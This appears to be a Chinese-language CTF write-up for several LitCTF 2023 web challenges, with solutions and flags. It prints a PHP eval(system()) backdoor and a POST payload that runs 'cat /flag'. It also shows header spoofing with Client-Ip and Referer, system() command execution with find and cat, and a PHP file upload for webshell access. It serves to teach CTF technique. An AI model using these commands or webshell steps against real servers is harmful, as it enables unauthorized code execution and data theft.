litctf 2023

[LitCTF 2023]Vim yyds

访问:.index.php.swp
下载下来

恢复文件:
vim -r .index.php.swp
或者vi -r .index.php.swp

1
2
3
4
5
6
7
8
9
<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)) {
echo "<p>Oh You got my password!</p>";
eval(system($_POST['cmd']));
}
?>

Give_Me_Your_Flag
base64编码:R2l2ZV9NZV9Zb3VyX0ZsYWc=
POST传入:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
NSSCTF{1c21591c-7690-47ee-8426-54f79824f06d}

[LitCTF 2023]Http pro max plus]

1.只允许本地访问 即需要伪造ip为本地
ip伪装的方法 Client-Ip: 127.0.0.1 X-Forwarded-For: 127.0.0.1
使用xff方法无法通过
在请求头中加上Client-Ip: 127.0.0.1后通过

2.You are not from pornhub.com !(即伪造Referer)
加上Referer: pornhub.com后通过

3.用Chrome浏览器啊!(即伪造User-Agent)
加上User-Agent: Chrome 后通过

4.不开代理你想上p站?代理服务器地址是Clash.win(伪造Via)
加上Via: Clash.win后通过

借一步说话--->> /wtfwtfwtfwtf.php

查看源码,得到
<!--你就冲吧,什么都冲只会害了你自己 bdy好康的在 /sejishikong.php-->

访问得到flag

[LitCTF 2023]导弹迷踪【js信息泄露】

查看源码,找到一个js文件夹

其内发现了:F|L|A|G {y0u_w1n_th1s_!!!}
text: function () {if (mLevel === 6) {return ‘GOT F|L|A|G {y0u_w1n_th1s_!!!}’;} else {return ‘CLICK TO CONTINUE’;}},

因此flag:F|L|A|G {y0u_w1n_th1s_!!!}
注意:提交的格式为NSSCTF{y0u_w1n_th1s_!!!}

[LitCTF 2023]PHP是世界上最好的语言!!【代码执行 getshell】

system(‘ls’);
system(‘pwd’);
system(‘find / -name flag*’);
system(‘cat /flag’);
//POWERFUL PHP TOOL
flag=NSSCTF{43fc5c29-e6b5-44f7-92d6-b2bef957a27c}

[LitCTF 2023]作业管理系统【创建文件 getshell】

admin/admin登录
创建文件:cc.php

蚁剑连接即可找到根目录的flag
flag=NSSCTF{959f0158-c22a-471b-8926-879171fae14c}

[LitCTF 2023]1zjs【js信息泄露】

查看源码,发现注释:/f@k3f1ag.php
PERFORMANCE OF THIS SOFTWARE.Your gift just take it : /f@k3f1ag.php

访问:/f@k3f1ag.php 得到加密的flag
找到jsfuck进行解密得到:NSSCTF{4[]b0[]8[]5[]0[]1[]6[]-8[]ace-4[]1[]0[]7[]-8[]4[]d0[]-1[]da4[]1[]ab1[]0[]8[]ba}

NSSCTF{4b085016-8ace-4107-84d0-1da41ab108ba}


litctf 2023
http://example.com/2023/05/15/比赛/[litctf 2023]/
作者
Englobe
发布于
2023年5月15日
许可协议